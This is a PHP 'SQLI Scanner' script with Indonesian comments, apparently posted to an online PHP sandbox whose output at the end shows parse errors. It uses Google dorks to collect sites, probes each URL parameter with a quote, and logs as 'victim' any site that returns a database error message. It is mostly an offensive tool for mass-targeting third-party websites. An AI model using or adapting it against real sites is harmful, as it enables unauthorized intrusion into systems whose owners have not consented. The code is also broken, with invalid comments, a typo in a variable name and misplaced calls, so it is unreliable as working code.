<?php
**/Membuat Dan menentukan error query :D**/
$error[] = 'You have an error in your SQL'; $error[] = 'supplied argument is not a valid MySQL result resource in';
$error[] = 'Division by zero in';
$error[] = 'Call to a member function';
$error[] = 'Microsoft JET Database';
$error[] = 'ODBC Microsoft Access Driver'; $error[] = 'Microsoft OLE DB Provider for SQL Server';
$error[] = 'Unclosed quotation mark';
$error[] = 'Microsoft OLE DB Provider for Oracle';
$error[] = 'Incorrect syntax near';
$error[] = 'SQL query failed';
**/note: pada variable $error[] kalian bisa menambahkan error string lagi sesuka hati kalian**/
**/Membuat Function Let it by (tampilkan berdasarkan a-z pada web victim)**/
function letItBy(){ ob_flush(); flush(); }
**/membuat function scan*/
function scan($query, $page=1)
{
$resultPerPage=8;
$start = $page*$resultPerPage;
$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPer Page}&start={$start}&q=" . urlencode($query);
$resultFromGoogle = json_decode( http_get($url, true) ,true);
if(isset($resultFromGoogle['responseStatus'])) {
if($resultFromGoogle['responseStatus'] != '200') return false;
if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
else return $resultFromGoogle['responseData']['results'];
}
else
die('The function <b>' . __FUNCTION__ . '</b> Kill me <br>' . $url );
}
**/membuat function http_get**/
function http_get($url, $safemode = false){
if($safemode === true) sleep(1);
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close();
}
**/membuat function sqli**/
function sqli($url) {
$data = http_get(str_replace("=", "='", $url));
$errors = implode("|", $GLOBALS['error']);
return preg_match("#{$errors}
#i", $data);
}
?>
<!--membuat halaman html dan form untuk submit-->
<html>
<head>
<title>SQLI Scanner by ./dcp92</title>
</head>
<body>
<center>please enter dork:<br>
<form method="post" name="pageform" action="" onsubmit="return validate(this);">
<input type="text" size="25" id="dcp92" name="sqli" value="<?php echo (isset($_POST['sqli']
{0})) ? htmlentities($_POST['sqli']) : 'inurl:/page.php?id='; ?>" />
<input type="submit" value="Start Scanning">
</form>
</center>
</body>
</html>
<?php
if(isset($_POST['sqli']{0})){
echo "Scanning has been started, please wait a few minutes";
for($googlePage = 1; $googlePage <= 10; $googlePage++){
$googleResult = scan($_POST['sqli'], $googlePage);
**/menampilkan jika scan sudah selesai**/
if(!$googleResult){
echo '<font color="red">google say: I not have more result. so, scanning done</font> ';
break;
}
for($victim = 0; $victim < sizeof($googleResult); $victim++){
**/menampilkan jika sukses**/
if(sqli($googleResult[$victim]['unescapedUrl'])){
file_put_contents("sqli.txt", "{$googleResult[$victim]['unescapedUrl']}\n");
} else {
**/menampilkan jika gagal**/
echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult
[$victim]['titleNoFormatting']}</a>\n";
letItBy();
}
}
}
?>
- Output for 4.4.2 - 4.4.9, 5.1.0 - 5.1.6, 5.2.0 - 5.2.17, 5.3.0 - 5.3.29, 5.4.0 - 5.4.34
- Parse error: syntax error, unexpected '*' in /in/lC4FW on line 2
Process exited with code 255. - Output for 4.3.0 - 4.3.1, 4.3.5 - 4.3.11, 4.4.0 - 4.4.1, 5.0.0 - 5.0.5
- Parse error: parse error, unexpected '*' in /in/lC4FW on line 2
Process exited with code 255. - Output for 4.3.2 - 4.3.4
- Parse error: parse error in /in/lC4FW on line 2
Process exited with code 255.
preferences:
211.07 ms | 1395 KiB | 124 Q